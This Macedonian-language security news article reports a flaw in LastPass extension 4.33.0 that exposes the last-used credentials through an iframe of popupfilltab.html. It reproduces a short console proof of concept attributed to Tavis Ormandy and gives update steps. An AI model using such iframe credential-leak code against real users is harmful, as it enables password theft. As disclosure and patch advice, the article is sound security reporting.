LastPass е еден од најчесто употребуваните и со тоа најпопуларните менаџери за лозинки. За жал и на најчесто користениот софтвер може да му се случи да издаде верзија со безбедносен пропуст. Ова беше случај со верзијата на ексензијата 4.33.0 за Chrome и Opera.
Пропустот е овозможен преку iframe на popupfilltab.html. Функцијата за проверка do_popupregister() не се повикува па се презентира последниот пар корисничко име/лозинка кое e користено. Репродуцирањето на пропустот е едноставно и може и сами да го направите, вели безбедносниот експерт Тавис Орманди.
- Одете на https://accounts.google.com кога треба да внесете лозинка притиснете на „…“
- Одете на example.com
- Во конзолата внесете:
y.height = 1024;
y.width = “100%”;
y.src=”chrome-extension://hdokiejnpimakedhajhdlcegeplioahd/popupfilltab.html”;
// or y.src=”moz-extension://…”;
// or y.src=”ms-browser-extension://…”;
document.body.appendChild(y);
Како да ја надградите екстензијта!
Корисниците кои не користат автоматска надградба на екстензиите можат лесно да ја преземат најновата верзија на Last Pass
За Google Chrome
- Одете на chrome://extensions
- Од горниот десен агол активирајте го „Developer mode“
- Притиснете „Update“
За Opera
- Одете на add-ons.opera.com/en/extensions
- Одберете Extensions > Manage Extensions
- Одберете Update
Добра вест е иако пропустот е критичен нема никаков показател дека бил злоупотребен. Last Pass набрзина го затвори пропустот, па може да продолжите безгрижно да го користите.